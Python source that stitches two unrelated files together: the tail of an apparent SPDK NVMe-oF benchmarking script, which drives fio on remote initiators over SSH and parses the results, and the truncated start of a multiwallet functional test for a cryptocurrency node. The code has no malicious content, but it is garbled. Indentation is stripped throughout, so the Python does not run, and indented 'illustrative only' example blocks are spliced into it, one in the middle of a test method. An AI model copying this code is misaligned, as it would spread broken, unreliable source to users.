def zip_spdk_sources(self, spdk_dir, dest_file):
self.log_print("Zipping SPDK source directory")
fh = zipfile.ZipFile(dest_file, "w", zipfile.ZIP_DEFLATED)
for root, directories, files in os.walk(spdk_dir, followlinks=True):
for file in files:
fh.write(os.path.relpath(os.path.join(root, file)))
fh.close()
self.log_print("Done zipping")
def read_json_stats(self, file):
with open(file, "r") as json_data:
data = json.load(json_data)
job_pos = 0  # use the first (aggregated) job entry, since fio runs with group_reporting
# Check if latency is in nano or microseconds to choose correct dict key
def get_lat_unit(key_prefix, dict_section):
# key prefix - lat, clat or slat.
# dict section - portion of json containing latency bucket in question
# Return dict key to access the bucket and unit as string
for k, v in dict_section.items():
if k.startswith(key_prefix):
return k, k.split("_")[1]
read_iops = float(data["jobs"][job_pos]["read"]["iops"])
read_bw = float(data["jobs"][job_pos]["read"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["read"])
read_avg_lat = float(data["jobs"][job_pos]["read"][lat_key]["mean"])
read_min_lat = float(data["jobs"][job_pos]["read"][lat_key]["min"])
read_max_lat = float(data["jobs"][job_pos]["read"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["read"])
read_p99_lat = float(data["jobs"][job_pos]["read"][clat_key]["percentile"]["99.000000"])
if "ns" in lat_unit:
read_avg_lat, read_min_lat, read_max_lat = [x / 1000 for x in [read_avg_lat, read_min_lat, read_max_lat]]
if "ns" in clat_unit:
read_p99_lat = read_p99_lat / 1000
write_iops = float(data["jobs"][job_pos]["write"]["iops"])
write_bw = float(data["jobs"][job_pos]["write"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["write"])
write_avg_lat = float(data["jobs"][job_pos]["write"][lat_key]["mean"])
write_min_lat = float(data["jobs"][job_pos]["write"][lat_key]["min"])
write_max_lat = float(data["jobs"][job_pos]["write"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["write"])
write_p99_lat = float(data["jobs"][job_pos]["write"][clat_key]["percentile"]["99.000000"])
if "ns" in lat_unit:
write_avg_lat, write_min_lat, write_max_lat = [x / 1000 for x in [write_avg_lat, write_min_lat, write_max_lat]]
if "ns" in clat_unit:
write_p99_lat = write_p99_lat / 1000
return [read_iops, read_bw, read_avg_lat, read_min_lat, read_max_lat, read_p99_lat,
write_iops, write_bw, write_avg_lat, write_min_lat, write_max_lat, write_p99_lat]
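# --- Example (illustrative only): the fio JSON shape read_json_stats ---
# expects (fio --output-format=json with group_reporting). Values are made
# up; the *_ns keys make get_lat_unit() return "ns", so latencies are
# scaled down to microseconds above.
_EXAMPLE_FIO_JSON = {
    "jobs": [{
        "read": {"iops": 1000.0, "bw": 4000.0,
                 "lat_ns": {"mean": 50000.0, "min": 1000.0, "max": 900000.0},
                 "clat_ns": {"percentile": {"99.000000": 120000.0}}},
        "write": {"iops": 0.0, "bw": 0.0,
                  "lat_ns": {"mean": 0.0, "min": 0.0, "max": 0.0},
                  "clat_ns": {"percentile": {"99.000000": 0.0}}},
    }]
}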
def parse_results(self, results_dir, initiator_count=None, run_num=None):
files = os.listdir(results_dir)
fio_files = filter(lambda x: ".fio" in x, files)
json_files = [x for x in files if ".json" in x]
# Create empty results file
csv_file = "nvmf_results.csv"
with open(os.path.join(results_dir, csv_file), "w") as fh:
header_line = ",".join(["Name",
"read_iops", "read_bw", "read_avg_lat_us",
"read_min_lat_us", "read_max_lat_us", "read_p99_lat_us",
"write_iops", "write_bw", "write_avg_lat_us",
"write_min_lat_us", "write_max_lat_us", "write_p99_lat_us"])
fh.write(header_line + "\n")
rows = set()
for fio_config in fio_files:
self.log_print("Getting FIO stats for %s" % fio_config)
job_name, _ = os.path.splitext(fio_config)
# If "_CPU" exists in name - ignore it
# Initiators for the same job could have diffrent num_cores parameter
job_name = re.sub(r"_\d+CPU", "", job_name)
job_result_files = [x for x in json_files if job_name in x]
self.log_print("Matching result files for current fio config:")
for j in job_result_files:
self.log_print("\t %s" % j)
# More than one initiator may have been used in the test, so check.
# Result files are named so that the string after the last "_" is the server name.
inits_names = set([os.path.splitext(x)[0].split("_")[-1] for x in job_result_files])
inits_avg_results = []
for i in inits_names:
self.log_print("\tGetting stats for initiator %s" % i)
# There may have been more than one test run for this job; average the results per initiator
i_results = [x for x in job_result_files if i in x]
separate_stats = []
for r in i_results:
stats = self.read_json_stats(os.path.join(results_dir, r))
separate_stats.append(stats)
self.log_print(stats)
z = [sum(c) for c in zip(*separate_stats)]
z = [c/len(separate_stats) for c in z]
inits_avg_results.append(z)
self.log_print("\tAverage results for initiator %s" % i)
self.log_print(z)
# Sum average results of all initiators running this FIO job
self.log_print("\tTotal results for %s from all initiators" % fio_config)
for a in inits_avg_results:
self.log_print(a)
total = ["{0:.3f}".format(sum(c)) for c in zip(*inits_avg_results)]
rows.add(",".join([job_name, *total]))
# Save results to file
for row in rows:
with open(os.path.join(results_dir, csv_file), "a") as fh:
fh.write(row + "\n")
self.log_print("You can find the test results in the file %s" % os.path.join(results_dir, csv_file))
def measure_sar(self, results_dir, sar_file_name):
self.log_print("Waiting %d delay before measuring SAR stats" % self.sar_delay)
time.sleep(self.sar_delay)
out = subprocess.check_output("sar -P ALL %s %s" % (self.sar_interval, self.sar_count), shell=True).decode(encoding="utf-8")
with open(os.path.join(results_dir, sar_file_name), "w") as fh:
for line in out.split("\n"):
if "Average" in line and "CPU" in line:
self.log_print("Summary CPU utilization from SAR:")
self.log_print(line)
if "Average" in line and "all" in line:
self.log_print(line)
fh.write(out)
class Initiator(Server):
def __init__(self, name, username, password, mode, nic_ips, ip, transport="rdma", nvmecli_dir=None, workspace="/tmp/spdk"):
super(Initiator, self).__init__(name, username, password, mode, nic_ips, transport)
self.ip = ip
self.spdk_dir = workspace
if nvmecli_dir:
self.nvmecli_bin = os.path.join(nvmecli_dir, "nvme")
else:
self.nvmecli_bin = "nvme" # Use system-wide nvme-cli
self.ssh_connection = paramiko.SSHClient()
self.ssh_connection.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh_connection.connect(self.ip, username=self.username, password=self.password)
self.remote_call("sudo rm -rf %s/nvmf_perf" % self.spdk_dir)
self.remote_call("mkdir -p %s" % self.spdk_dir)
def __del__(self):
self.ssh_connection.close()
def put_file(self, local, remote_dest):
ftp = self.ssh_connection.open_sftp()
ftp.put(local, remote_dest)
ftp.close()
def get_file(self, remote, local_dest):
ftp = self.ssh_connection.open_sftp()
ftp.get(remote, local_dest)
ftp.close()
def remote_call(self, cmd):
stdin, stdout, stderr = self.ssh_connection.exec_command(cmd)
out = stdout.read().decode(encoding="utf-8")
err = stderr.read().decode(encoding="utf-8")
return out, err
def copy_result_files(self, dest_dir):
self.log_print("Copying results")
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
# Get list of result files from initiator and copy them back to target
stdout, stderr = self.remote_call("ls %s/nvmf_perf" % self.spdk_dir)
file_list = stdout.strip().split("\n")
for file in file_list:
self.get_file(os.path.join(self.spdk_dir, "nvmf_perf", file),
os.path.join(dest_dir, file))
self.log_print("Done copying results")
def discover_subsystems(self, address_list, subsys_no):
num_nvmes = range(0, subsys_no)
nvme_discover_output = ""
for ip, subsys_no in itertools.product(address_list, num_nvmes):
self.log_print("Trying to discover: %s:%s" % (ip, 4420 + subsys_no))
nvme_discover_cmd = ["sudo",
"%s" % self.nvmecli_bin,
"discover", "-t %s" % self.transport,
"-s %s" % (4420 + subsys_no),
"-a %s" % ip]
nvme_discover_cmd = " ".join(nvme_discover_cmd)
stdout, stderr = self.remote_call(nvme_discover_cmd)
if stdout:
nvme_discover_output = nvme_discover_output + stdout
subsystems = re.findall(r'trsvcid:\s(\d+)\s+' # get svcid number
r'subnqn:\s+([a-zA-Z0-9\.\-\:]+)\s+' # get NQN id
r'traddr:\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', # get IP address
nvme_discover_output) # from nvme discovery output
subsystems = filter(lambda x: x[-1] in address_list, subsystems)
subsystems = list(set(subsystems))
subsystems.sort(key=lambda x: x[1])
self.log_print("Found matching subsystems on target side:")
for s in subsystems:
self.log_print(s)
return subsystems
def gen_fio_config(self, rw, rwmixread, block_size, io_depth, subsys_no, num_jobs=None, ramp_time=0, run_time=10):
fio_conf_template = """
[global]
ioengine={ioengine}
{spdk_conf}
thread=1
group_reporting=1
direct=1
norandommap=1
rw={rw}
rwmixread={rwmixread}
bs={block_size}
iodepth={io_depth}
time_based=1
ramp_time={ramp_time}
runtime={run_time}
"""
if "spdk" in self.mode:
subsystems = self.discover_subsystems(self.nic_ips, subsys_no)
bdev_conf = self.gen_spdk_bdev_conf(subsystems)
self.remote_call("echo '%s' > %s/bdev.conf" % (bdev_conf, self.spdk_dir))
ioengine = "%s/examples/bdev/fio_plugin/fio_plugin" % self.spdk_dir
spdk_conf = "spdk_conf=%s/bdev.conf" % self.spdk_dir
filename_section = self.gen_fio_filename_conf(subsystems)
else:
ioengine = "libaio"
spdk_conf = ""
filename_section = self.gen_fio_filename_conf()
fio_config = fio_conf_template.format(ioengine=ioengine, spdk_conf=spdk_conf,
rw=rw, rwmixread=rwmixread, block_size=block_size,
io_depth=io_depth, ramp_time=ramp_time, run_time=run_time)
if num_jobs:
fio_config = fio_config + "numjobs=%s" % num_jobs
fio_config = fio_config + filename_section
fio_config_filename = "%s_%s_%s_m_%s" % (block_size, io_depth, rw, rwmixread)
if hasattr(self, "num_cores"):
fio_config_filename += "_%sCPU" % self.num_cores
fio_config_filename += ".fio"
self.remote_call("mkdir -p %s/nvmf_perf" % self.spdk_dir)
self.remote_call("echo '%s' > %s/nvmf_perf/%s" % (fio_config, self.spdk_dir, fio_config_filename))
self.log_print("Created FIO Config:")
self.log_print(fio_config)
return os.path.join(self.spdk_dir, "nvmf_perf", fio_config_filename)
def run_fio(self, fio_config_file, run_num=None):
job_name, _ = os.path.splitext(fio_config_file)
self.log_print("Starting FIO run for job: %s" % job_name)
if run_num:
for i in range(1, run_num + 1):
output_filename = job_name + "_run_" + str(i) + "_" + self.name + ".json"
cmd = "sudo /usr/src/fio/fio %s --output-format=json --output=%s" % (fio_config_file, output_filename)
output, error = self.remote_call(cmd)
self.log_print(output)
self.log_print(error)
else:
output_filename = job_name + "_" + self.name + ".json"
cmd = "sudo /usr/src/fio/fio %s --output-format=json --output=%s" % (fio_config_file, output_filename)
output, error = self.remote_call(cmd)
self.log_print(output)
self.log_print(error)
self.log_print("FIO run finished. Results in: %s" % output_filename)
class KernelTarget(Target):
def __init__(self, name, username, password, mode, nic_ips,
use_null_block=False, sar_settings=None, transport="rdma", nvmet_dir=None, **kwargs):
super(KernelTarget, self).__init__(name, username, password, mode, nic_ips,
transport, use_null_block, sar_settings)
if nvmet_dir:
self.nvmet_bin = os.path.join(nvmet_dir, "nvmetcli")
else:
self.nvmet_bin = "nvmetcli"
def __del__(self):
nvmet_command(self.nvmet_bin, "clear")
def kernel_tgt_gen_nullblock_conf(self, address):
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": "/dev/nullb0",
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": 1
}
],
"nqn": "nqn.2018-09.io.spdk:cnode1"
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": address,
"trsvcid": "4420",
"trtype": "%s" % self.transport,
},
"portid": 1,
"referrals": [],
"subsystems": ["nqn.2018-09.io.spdk:cnode1"]
})
with open("kernel.conf", 'w') as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
def kernel_tgt_gen_subsystem_conf(self, nvme_list, address_list):
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
# Split disks between NIC IP's
disks_per_ip = int(len(nvme_list) / len(address_list))
disk_chunks = [nvme_list[i * disks_per_ip:(i + 1) * disks_per_ip] for i in range(0, len(address_list))]
subsys_no = 1
port_no = 0
for ip, chunk in zip(address_list, disk_chunks):
for disk in chunk:
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": disk,
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": subsys_no
}
],
"nqn": "nqn.2018-09.io.spdk:cnode%s" % subsys_no
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": ip,
"trsvcid": "%s" % (4420 + port_no),
"trtype": "%s" % self.transport
},
"portid": subsys_no,
"referrals": [],
"subsystems": ["nqn.2018-09.io.spdk:cnode%s" % subsys_no]
})
subsys_no += 1
port_no += 1
with open("kernel.conf", "w") as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
def tgt_start(self):
self.log_print("Configuring kernel NVMeOF Target")
if self.null_block:
print("Configuring with null block device.")
if len(self.nic_ips) > 1:
print("Testing with null block limited to single RDMA NIC.")
print("Please specify only 1 IP address.")
exit(1)
self.subsys_no = 1
self.kernel_tgt_gen_nullblock_conf(self.nic_ips[0])
else:
print("Configuring with NVMe drives.")
nvme_list = get_nvme_devices()
self.kernel_tgt_gen_subsystem_conf(nvme_list, self.nic_ips)
self.subsys_no = len(nvme_list)
nvmet_command(self.nvmet_bin, "clear")
nvmet_command(self.nvmet_bin, "restore kernel.conf")
self.log_print("Done configuring kernel NVMeOF Target")
class SPDKTarget(Target):
def __init__(self, name, username, password, mode, nic_ips, num_cores, num_shared_buffers=4096,
use_null_block=False, sar_settings=None, transport="rdma", **kwargs):
super(SPDKTarget, self).__init__(name, username, password, mode, nic_ips, transport, use_null_block, sar_settings)
self.num_cores = num_cores
self.num_shared_buffers = num_shared_buffers
def spdk_tgt_configure(self):
self.log_print("Configuring SPDK NVMeOF target via RPC")
numa_list = get_used_numa_nodes()
# Create RDMA transport layer
rpc.nvmf.nvmf_create_transport(self.client, trtype=self.transport, num_shared_buffers=self.num_shared_buffers)
self.log_print("SPDK NVMeOF transport layer:")
rpc.client.print_dict(rpc.nvmf.get_nvmf_transports(self.client))
if self.null_block:
nvme_section = self.spdk_tgt_add_nullblock()
subsystems_section = self.spdk_tgt_add_subsystem_conf(self.nic_ips, req_num_disks=1)
else:
nvme_section = self.spdk_tgt_add_nvme_conf()
subsystems_section = self.spdk_tgt_add_subsystem_conf(self.nic_ips)
self.log_print("Done configuring SPDK NVMeOF Target")
def spdk_tgt_add_nullblock(self):
self.log_print("Adding null block bdev to config via RPC")
rpc.bdev.construct_null_bdev(self.client, 102400, 4096, "Nvme0n1")
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.get_bdevs(self.client))
def spdk_tgt_add_nvme_conf(self, req_num_disks=None):
self.log_print("Adding NVMe bdevs to config via RPC")
bdfs = get_nvme_devices_bdf()
bdfs = [b.replace(":", ".") for b in bdfs]
if req_num_disks:
if req_num_disks > len(bdfs):
self.log_print("ERROR: Requested number of disks is more than available %s" % len(bdfs))
sys.exit(1)
else:
bdfs = bdfs[0:req_num_disks]
for i, bdf in enumerate(bdfs):
rpc.bdev.construct_nvme_bdev(self.client, name="Nvme%s" % i, trtype="PCIe", traddr=bdf)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.get_bdevs(self.client))
def spdk_tgt_add_subsystem_conf(self, ips=None, req_num_disks=None):
self.log_print("Adding subsystems to config")
if not req_num_disks:
req_num_disks = get_nvme_devices_count()
# Distribute bdevs between provided NICs
num_disks = range(1, req_num_disks + 1)
disks_per_ip = int(len(num_disks) / len(ips))
disk_chunks = [num_disks[i * disks_per_ip:(i + 1) * disks_per_ip] for i in range(0, len(ips))]
# Create subsystems, add bdevs to namespaces, add listeners
for ip, chunk in zip(ips, disk_chunks):
for c in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % c
serial = "SPDK00%s" % c
bdev_name = "Nvme%sn1" % (c - 1)
rpc.nvmf.nvmf_subsystem_create(self.client, nqn, serial,
allow_any_host=True, max_namespaces=8)
rpc.nvmf.nvmf_subsystem_add_ns(self.client, nqn, bdev_name)
rpc.nvmf.nvmf_subsystem_add_listener(self.client, nqn,
trtype=self.transport,
traddr=ip,
trsvcid="4420",
adrfam="ipv4")
self.log_print("SPDK NVMeOF subsystem configuration:")
rpc.client.print_dict(rpc.nvmf.get_nvmf_subsystems(self.client))
def tgt_start(self):
self.subsys_no = get_nvme_devices_count()
self.log_print("Starting SPDK NVMeOF Target process")
nvmf_app_path = os.path.join(self.spdk_dir, "app/nvmf_tgt/nvmf_tgt")
command = " ".join([nvmf_app_path, "-m", self.num_cores])
proc = subprocess.Popen(command, shell=True)
self.pid = os.path.join(self.spdk_dir, "nvmf.pid")
with open(self.pid, "w") as fh:
fh.write(str(proc.pid))
self.nvmf_proc = proc
self.log_print("SPDK NVMeOF Target PID=%s" % self.pid)
self.log_print("Waiting for spdk to initilize...")
while True:
if os.path.exists("/var/tmp/spdk.sock"):
break
time.sleep(1)
self.client = rpc.client.JSONRPCClient("/var/tmp/spdk.sock")
self.spdk_tgt_configure()
def __del__(self):
if hasattr(self, "nvmf_proc"):
try:
self.nvmf_proc.terminate()
self.nvmf_proc.wait()
except Exception as e:
self.log_print(e)
self.nvmf_proc.kill()
self.nvmf_proc.communicate()
class KernelInitiator(Initiator):
def __init__(self, name, username, password, mode, nic_ips, ip, transport, **kwargs):
super(KernelInitiator, self).__init__(name, username, password, mode, nic_ips, ip, transport)
def __del__(self):
self.ssh_connection.close()
def kernel_init_connect(self, address_list, subsys_no):
subsystems = self.discover_subsystems(address_list, subsys_no)
self.log_print("Below connection attempts may result in error messages, this is expected!")
for subsystem in subsystems:
self.log_print("Trying to connect %s %s %s" % subsystem)
self.remote_call("sudo %s connect -t %s -s %s -n %s -a %s -i 8" % (self.nvmecli_bin, self.transport, *subsystem))
time.sleep(2)
def kernel_init_disconnect(self, address_list, subsys_no):
subsystems = self.discover_subsystems(address_list, subsys_no)
for subsystem in subsystems:
self.remote_call("sudo %s disconnect -n %s" % (self.nvmecli_bin, subsystem[1]))
time.sleep(1)
def gen_fio_filename_conf(self):
out, err = self.remote_call("lsblk -o NAME -nlp")
nvme_list = [x for x in out.split("\n") if "nvme" in x]
filename_section = ""
for i, nvme in enumerate(nvme_list):
filename_section = "\n".join([filename_section,
"[filename%s]" % i,
"filename=%s" % nvme])
return filename_section
class SPDKInitiator(Initiator):
def __init__(self, name, username, password, mode, nic_ips, ip, num_cores=None, transport="rdma", **kwargs):
super(SPDKInitiator, self).__init__(name, username, password, mode, nic_ips, ip, transport)
if num_cores:
self.num_cores = num_cores
def install_spdk(self, local_spdk_zip):
self.put_file(local_spdk_zip, "/tmp/spdk_drop.zip")
self.log_print("Copied sources zip from target")
self.remote_call("unzip -qo /tmp/spdk_drop.zip -d %s" % self.spdk_dir)
self.log_print("Sources unpacked")
self.remote_call("cd %s; git submodule update --init; ./configure --with-rdma --with-fio=/usr/src/fio;"
"make clean; make -j$(($(nproc)*2))" % self.spdk_dir)
self.log_print("SPDK built")
self.remote_call("sudo %s/scripts/setup.sh" % self.spdk_dir)
def gen_spdk_bdev_conf(self, remote_subsystem_list):
header = "[Nvme]"
row_template = """ TransportId "trtype:{transport} adrfam:IPv4 traddr:{ip} trsvcid:{svc} subnqn:{nqn}" Nvme{i}"""
bdev_rows = [row_template.format(transport=self.transport,
svc=x[0],
nqn=x[1],
ip=x[2],
i=i) for i, x in enumerate(remote_subsystem_list)]
bdev_rows = "\n".join(bdev_rows)
bdev_section = "\n".join([header, bdev_rows])
return bdev_section
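# --- Example (illustrative only): a rendered [Nvme] section. ---
# For one discovered subsystem ('4420', 'nqn.2018-09.io.spdk:cnode1',
# '192.0.2.1') with the rdma transport, gen_spdk_bdev_conf would emit:
#
# [Nvme]
#   TransportId "trtype:rdma adrfam:IPv4 traddr:192.0.2.1 trsvcid:4420 subnqn:nqn.2018-09.io.spdk:cnode1" Nvme0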
def gen_fio_filename_conf(self, remote_subsystem_list):
subsystems = [str(x) for x in range(0, len(remote_subsystem_list))]
# If num_cores is set, limit FIO to that number of CPUs
# Otherwise each connected subsystem gets its own CPU
if hasattr(self, 'num_cores'):
self.log_print("Limiting FIO workload execution to %s cores" % self.num_cores)
threads = range(0, int(self.num_cores))
else:
threads = range(0, len(subsystems))
n = int(len(subsystems) / len(threads))
filename_section = ""
for t in threads:
header = "[filename%s]" % t
disks = "\n".join(["filename=Nvme%sn1" % x for x in subsystems[n * t:n + n * t]])
filename_section = "\n".join([filename_section, header, disks])
return filename_section
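# --- Example (illustrative only): how bdevs are grouped per FIO thread. ---
# A stand-alone re-implementation of the slicing in gen_fio_filename_conf,
# shown with four subsystems and num_cores=2: each [filenameN] section gets
# a contiguous pair of Nvme bdevs.
def _demo_filename_grouping():
    subsystems = ["0", "1", "2", "3"]
    threads = range(0, 2)
    n = int(len(subsystems) / len(threads))
    return {t: subsystems[n * t:n + n * t] for t in threads}
    # -> {0: ['0', '1'], 1: ['2', '3']}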
if __name__ == "__main__":
spdk_zip_path = "/tmp/spdk.zip"
target_results_dir = "/tmp/results"
if len(sys.argv) > 1:
config_file_path = sys.argv[1]
else:
script_full_dir = os.path.dirname(os.path.realpath(__file__))
config_file_path = os.path.join(script_full_dir, "config.json")
print("Using config file: %s" % config_file_path)
with open(config_file_path, "r") as config:
data = json.load(config)
initiators = []
fio_cases = []
for k, v in data.items():
if "target" in k:
if data[k]["mode"] == "spdk":
target_obj = SPDKTarget(name=k, **data["general"], **v)
elif data[k]["mode"] == "kernel":
target_obj = KernelTarget(name=k, **data["general"], **v)
elif "initiator" in k:
if data[k]["mode"] == "spdk":
init_obj = SPDKInitiator(name=k, **data["general"], **v)
elif data[k]["mode"] == "kernel":
init_obj = KernelInitiator(name=k, **data["general"], **v)
initiators.append(init_obj)
elif "fio" in k:
fio_workloads = itertools.product(data[k]["bs"],
data[k]["qd"],
data[k]["rw"])
fio_run_time = data[k]["run_time"]
fio_ramp_time = data[k]["ramp_time"]
fio_rw_mix_read = data[k]["rwmixread"]
fio_run_num = data[k]["run_num"] if "run_num" in data[k].keys() else None
fio_num_jobs = data[k]["num_jobs"] if "num_jobs" in data[k].keys() else None
else:
continue
# Copy and install SPDK on remote initiators
target_obj.zip_spdk_sources(target_obj.spdk_dir, spdk_zip_path)
threads = []
for i in initiators:
if i.mode == "spdk":
t = threading.Thread(target=i.install_spdk, args=(spdk_zip_path,))
threads.append(t)
t.start()
for t in threads:
t.join()
target_obj.tgt_start()
# Run FIO tests (poor man's threading: one thread per initiator)
for block_size, io_depth, rw in fio_workloads:
threads = []
configs = []
for i in initiators:
if i.mode == "kernel":
i.kernel_init_connect(i.nic_ips, target_obj.subsys_no)
cfg = i.gen_fio_config(rw, fio_rw_mix_read, block_size, io_depth, target_obj.subsys_no,
fio_num_jobs, fio_ramp_time, fio_run_time)
configs.append(cfg)
for i, cfg in zip(initiators, configs):
t = threading.Thread(target=i.run_fio, args=(cfg, fio_run_num))
threads.append(t)
if target_obj.enable_sar:
sar_file_name = "_".join([str(block_size), str(rw), str(io_depth), "sar"])
sar_file_name = ".".join([sar_file_name, "txt"])
t = threading.Thread(target=target_obj.measure_sar, args=(target_results_dir, sar_file_name))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in initiators:
if i.mode == "kernel":
i.kernel_init_disconnect(i.nic_ips, target_obj.subsys_no)
i.copy_result_files(target_results_dir)
target_obj.parse_results(target_results_dir)
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The C1pzo Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a c1pzod node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import C1pzoTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(C1pzoTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
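# --- Example (illustrative only): how wallet_file resolves names. ---
# The default wallet resolves to <walletdir>/<default>/<data file>; a
# directory-backed wallet like 'w1' resolves to wallets/w1/wallet.dat;
# a plain file name like 'w8' maps straight to wallets/w8.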
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because of w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB refuses to open duplicate wallet files; SQLite does not have this limitation. While that may be desirable in the future, it is not necessary.
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
